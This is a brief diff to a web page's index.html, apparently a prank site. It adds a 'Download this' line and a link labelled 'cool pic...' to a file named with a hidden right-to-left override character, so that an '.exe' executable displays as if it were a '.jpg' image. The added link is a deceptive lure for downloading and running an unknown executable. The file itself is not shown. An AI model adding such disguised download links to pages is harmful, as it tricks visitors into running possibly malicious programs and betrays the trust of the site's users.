--- a/index.html
+++ b/index.html
@@ -67,6 +67,8 @@ masage = "why would you press cancel -_-";}
 document.getElementById("fmlnk").innerHTML = masage;
 }
 </script>
+<p style="font-family:papyrus"> Download <i>this</i> :</p>
+  <a href="./mexet‮gpj.exe" download> cool pic...</a>
 </center>
 </body>
 </html> 
